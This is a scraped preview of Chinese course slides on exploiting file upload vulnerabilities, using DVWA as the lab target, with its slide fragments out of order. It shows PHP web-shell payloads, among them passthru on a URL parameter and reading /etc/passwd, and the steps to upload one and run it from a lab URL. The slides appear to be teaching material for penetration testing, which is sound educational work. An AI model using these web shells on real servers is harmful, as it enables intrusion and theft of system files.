Web渗透与防御 项目5.7文件上传漏洞-ok1

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
kable/uploads/cmd.php?cmd=ls /
Βιβλιοθήκη Baidu
构建恶意代码文件
• 恶意代码实例:
• <?php phpinfo(); ?> • <?php passthru($_GET[cmd]) ?> • <?php readfile("/etc/passwd"); echo "<br/>"; ?> • <?php passthru("ls -FR / | grep '/$'"); echo '<br />'; ?>
一、文件上传漏洞利用——实例
文件上传漏洞利用(实例1)
• 1.使用passthru() 函数来构建具有执行外部命令恶意代码的 PHP文件,例:cmd.php
• 2.将恶意代码上传到目标服务器,并显示出上传之后的路径和 文件名,例:../../hackable/uploads/cmd.php
• 3.通过浏览器URL执行恶意代码的页面,例: • http://192.168.1.105/master/vulnerabilities/upload/../../hac
DVWA
上传恶意代码文件
• 通过Web文件上传功能上传恶意代码文件,例:
浏览器URL执行恶意代码实例
• http://192.168.1.105/master/vulnerabilities/upload/../../hackable/upl oads/info.php
谢谢观看
相关文档
最新文档